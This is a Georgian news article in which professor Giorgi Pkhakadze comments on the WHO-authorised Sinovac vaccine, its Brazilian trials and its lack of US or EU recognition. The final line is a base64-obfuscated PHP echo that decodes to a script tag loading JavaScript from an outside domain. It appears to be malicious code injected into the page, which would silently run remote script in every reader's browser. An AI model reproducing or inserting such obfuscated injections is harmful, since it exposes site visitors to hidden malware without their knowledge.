celsiusi
ავერსი შნაიდერი
პროფესორის, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი ფხაკაძის განცხადბით, ჩინელები უფრო ჭკვიანები აღმოჩდნენ, ვიდრე რუსები. ჩინეთმა „სინოვაკზე“ კვლევები აწარმოა ბრაზილიაში და ეს ვაქცინა ეფექტური აღმოჩნდა.
 
გიორგი ფხაკაძის განმარტებით, კარგი ამბავია, რომ კიდევ ერთი ავტორიზებული ვაქცინა გვაქვს - „სინოვაკი“ რომელმაც ჯანდაცვის მსოფლიო ორგანიზაციის ავტორიზაცია მიიღო.
 
“საერთოდ, მე ვიყავი, ვარ და ვიქნები მანიპულაციების წინააღმდეგი და ჩინეთთან ეს პრობლემა რომ იყო, ამაში ორი აზრი არ არსებობს. თუმცა ჩინელები უფრო ჭკვიანები აღმოჩდნენ, ვიდრე რუსები. 
 
ჩინეთმა „სინოვაკზე“ კვლევები აწარმოა ბრაზილიაში და ეს ვაქცინა ეფექტური აღმოჩნდა. უნდა გვიხაროდეს, ოღონდ ფრთხილად! 
 
შედარებისათვის - „სინოფარმის“ შემთხვევაში კვლევა ჩატარდა ძირითადად ახალგაზრდა მამაკაცებში 18-დან 59 წლამდე, ჯანმრთელ პოპულაციაში. „სინოვაკზე“ კვლევები უფრო რეალურ ცხოვრებაში ჩატარდა და არსებულ მონაცემებში ასაკობრივი ზღვარი არ არის ანუ გამოიყენება 18 წლის ზევით”- განაცხადა ფხაკაძემ. 
 
მისივე თქმით, კარგია, რომ უკვე ბევრი ვაქცინა გვაქვს, მაგრამ ფაქტია, რომ პირველ ადგილზეა „ფაიზერი“, შემდეგ „მოდერნა“ და ა.შ..
 
“ნებისმიერი ვაქცინის მთავარი დატვირთვა არის ის, რომ ვაქცინირების შემდეგ ვაქცინირებული ადამიანი დაინფიცირების შემთხვევაში არ მოხვდება რეანიმაციაში და არ გარდაიცვლება. თუმცა ვაღიაროთ, რომ ინფიცირებისგან 100%-იანი დაცვა არც ერთი ვაქცინის შემთხვევაში არ არსებობს; არის დაცვის სხვადასხვა პროცენტულობა;
 
„სინოვაკის“ შემთხვევაში ჩინელებმა ჭკუა ისწავლეს. რომ გითხრათ, იდეალური ინფორმაცია წარმოადგინეს-მეთქი, არა, მაგრამ საკმაოდ შთამბეჭდავი კვლევა დადეს ბრაზილიის მაგალითზე. თუმცა ბრაზილია ხომ არ არის მარტო, წარმოადგინონ სხვა ქვეყნების, ევროპის და ა.შ. ქვეყნების მაგალითზე და ვნახოთ.”- განაცხადა ფხაკაძემ.
 
მან ასევე აღნიშნა, რომ არ უნდა დაგვავიწყდეს - „სინოვაკი“ არის მხოლოდ ჯანმოს მიერ აკრედტირებული. ამ ვაქცინას არა აქვს არც აშშ-ში, არც ევროპაში აღიარება და ამ ქვეყნებში ვალიდურობა არა აქვს.
 
“მიუხედავად ყველაფრისა - მე მინდა, ჩემს სამშობლოში იყოს კარგი კი არა, საუკეთესო ვაქცინა. ეს დანაშაულია, რომ შენი მეგობრევისთვის, ნათესავებისთვის, ახლობლებისთვის საუკეთესო გინდოდეს?! მინდა, ვეცდები და იქნება კიდეც!
 
იმედი მაქვს, რომ  სექტემბერ-ოქტომბერში ევროპიდან საქართველოში კარგი ვაქცინები შემოვა, რომელიც უკეთ დაიცავს მოსახლეობას”- განაცხადა გიორგი ფხაკაძემ. 
 
 
 
2963
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");